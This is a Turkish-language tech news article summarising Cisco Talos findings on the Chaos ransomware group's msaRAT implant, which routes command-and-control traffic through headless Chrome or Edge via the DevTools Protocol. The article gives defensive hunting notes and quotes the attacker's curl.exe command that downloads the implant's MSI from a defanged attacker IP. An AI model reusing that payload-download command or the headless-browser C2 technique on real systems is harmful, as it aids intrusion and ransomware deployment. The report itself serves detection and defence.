Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Yazı Tipi BoyutlandırıcıAa
  • Anasayfa
  • Teknoloji
    • Siber Güvenlik
    • Yapay Zeka
    • Donanım
    • Bilim
  • Yazılım
  • Savunma & İstihbarat
  • Oyun
  • Yaşam
    • Finans
    • Sinema
    • Dünyadan Haberler
  • İş Birliği
Okuma: Acil: Chaos Ransomware, C2 Trafiğini Headless Tarayıcılar ile Yönlendiriyor
Paylaş
Yazı Tipi BoyutlandırıcıAa
Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Ara
Bizi Takip Et
  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti
© 2026 Teknomers. All Rights Reserved.

Anasayfa » Acil: Chaos Ransomware, C2 Trafiğini Headless Tarayıcılar ile Yönlendiriyor

Siber Güvenlik

Acil: Chaos Ransomware, C2 Trafiğini Headless Tarayıcılar ile Yönlendiriyor

teknomers
Son güncelleme: 23 Temmuz 2026 19:20
teknomers
Paylaş
Paylaş

Giriş

Chaos fidye yazılım grubu, hedeflerinin kendi tarayıcıları üzerinden komut ve kontrol yapısını kurarak dikkat çekici bir saldırı gerçekleştirmiştir. Bu durum, tarayıcıların siber güvenlikteki rolünün ne kadar kritik olduğunu bir kez daha gözler önüne sermektedir.

Saldırı Nasıl Çalışıyor?

Cisco Talos, bu saldırının arkasındaki Rust tabanlı implant olan msaRAT‘ı detaylandırdı. Bu implant, etkilenen Windows bilgisayarında çalışarak, kendi başına dışa bağlantı kurmadan, 127.0.0.1 adresi ile iletişim kurar. Ana saldırı ise Chrome veya Edge’in headless modda başlatılmasıyla gerçekleşir ve tarayıcı, Chrome DevTools Protocol kullanılarak kontrol edilir.

Etkilenen Sistemler

Bu saldırı, genel olarak aşağıdaki sistemleri etkilemektedir:

  • Windows işletim sistemleri
  • Google Chrome
  • Microsoft Edge

Çözüm ve Korunma

Saldırının başlatılması için msaRAT implantı, hedef bilgisayara yüklenir ve ardından şifreleyici çalışmaya başlamadan önce etkisini gösterir. Cisco Talos’un açıkladığına göre saldırganın sistemi ele geçirmek için kullandığı yöntemler arasında:

  • Spam saldırıları
  • Vishing (sesli dolandırıcılık)
  • Quick Assist uygulaması
  • Uzaktan erişim yönetim (RMM) araçları

Aynı zamanda, implant bir curl komutuyla indirilir:
curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:programdataupdate_ms.msi

Bu yapılandırma, özellikle port 443 üzerinden düzgün biçimde kontrollere takılmadan geçmesine neden olur. Ayrıca, implant, dinamik bir DLL yükleyerek sistemde hedefe injectable bir durum yaratır.

Hunting Notes

Saldırının tespit edilmesi, süreç davranışlarına dayalı bir yaklaşım gerektirir. Cisco Talos’a göre, tüm dış iletişimler geçerli bir tarayıcı süreci olarak gözlemlenir. Bu nedenle, aşağıdaki kriterlerle sistemlerde arama yapılmalıdır:

  • Tarayıcıları başlatan bir installer, service veya başka bir ebeveyn süreç ile ilişkilendirme yapılmalıdır.
  • Tarayıcının –headless=new ve –remote-debugging-port ile çalıştığı süreçler incelenmelidir.
  • Debugging portuna giden döngüsel trafiği ve dışa WebRTC bağlantılarını takip edilmelidir.

Bu süreçte, özel işareti sağlayan öğeler arasında Runtime.addBinding ve Runtime.evaluate bulunmaktadır.

Sonuç

Okuyucular, sistemlerinde bu tür bir tehdidin önlenmesi amacıyla aşağıdaki adımları atmalıdır:

  • Yazılımlarını güncelleyerek güvenlik açıklarını kapatmalıdır.
  • Ağ güvenlik duvarlarındaki port ayarlarını gözden geçirmelidir.
  • Legitimite dışındaki Chrome veya Edge süreçlerini izlemelidir.

Unutulmamalıdır ki, msaRAT tarayıcı güvenlik açıklarına dayanmadığı için, mevcut bir tarayıcı güncellemesi ile önlenemez. Süreç davranışlarını takip etmek, saldırının erken aşamalarında tespit edilmesi için kritik öneme sahiptir.

Brian Cox, Anthony Hopkins’in Büyük Hannibal Lecter Şöhreti İle Tamamen Harika
Tarayıcılar nasıl siber savaşın ana alanı haline geldi?
Lilium, Suudi Arabistan ile 100’e kadar eVTOL uçağı için satış anlaşması imzaladı
Yaklaşan Veri Gizliliği Düzenlemelerine Hazırlıksız Kuruluşlar
TrickBot Çetesi Ukrayna’yı “Sistematik Olarak” Hedeflemeye Odak Noktasını Değiştirdi
ETİKETLENDİ:AcilChaosHeadlessileRansomwaretarayıcılartrafiğiniYönlendiriyor
Bu Makaleyi Paylaş
Facebook Bağlantıyı Kopyala Yazdır
Paylaş
Önceki Makale Microsoft, Xbox Insiders için Ücretsiz Reklam Destekli Bulut Oyunları Test Ediyor
Sonraki Makale Kritik Uyarı: Notepad++ Eklentileriyle Gizli Zararlı Yazılım Yükleniyor

Sanal Medya

FacebookBeğen
452Takip Et
PinterestSabitle
237Takip Et

Son Eklenenler

OpenAI Sağlık İçin ChatGPT’yi Herkese Sunuyor
Liste
AB, Google’a Kendi Servislerine Öncelik Vermekten 1 Milyar Dolar Ceza Kesti
Genel
Yeni Oyuncular İçin İdeal Başlangıç: Path of Exile’deki Beceriler Yenilendi
Oyun
Tesla’nın Robotaksileri Geri Sayımda
Genel
Meta’dan yeni AI reklam serisi: İnsan yokoluşuna dair şarkı ile
Yapay Zeka
Yapay Zeka Bellek Krizi Araba Fiyatlarını Artırıyor, GM Uyarıyor
Donanım
//

Siber güvenlik, yapay zeka ve savunma sanayiinden; finans ve sinema dünyasına uzanan geniş bir yelpaze. Teknomers; teknoloji, strateji ve yazılım dünyasını sade bir dille sizlerle buluşturuyor.

Kurumsal

  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti

Kategoriler

  • Teknoloji
  • Oyun
  • Sinema
  • Siber Güvenlik
  • Bilim
  • Finans
  • Dünyadan Güncel Haberler

Populer

  • TV'de Ücretsiz İzlenebilen Şifresiz Erotik Kanallar (2025 Güncel Frekans Listesi)

  • The Last of Us PC Kontrolleri: Hızlı Silah Değiştirme ve Tüm Tuşlar (2025)

  • Hogwarts Legacy'de Odaklanma İksiri Nasıl Yapılır?

Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Bizi Takip Et
© 2026 Teknomers. All Rights Reserved.
Welcome Back!

Sign in to your account

Kullanıcı Adı veya E-posta Adresi
Şifre

Şifrenizi mi unuttunuz?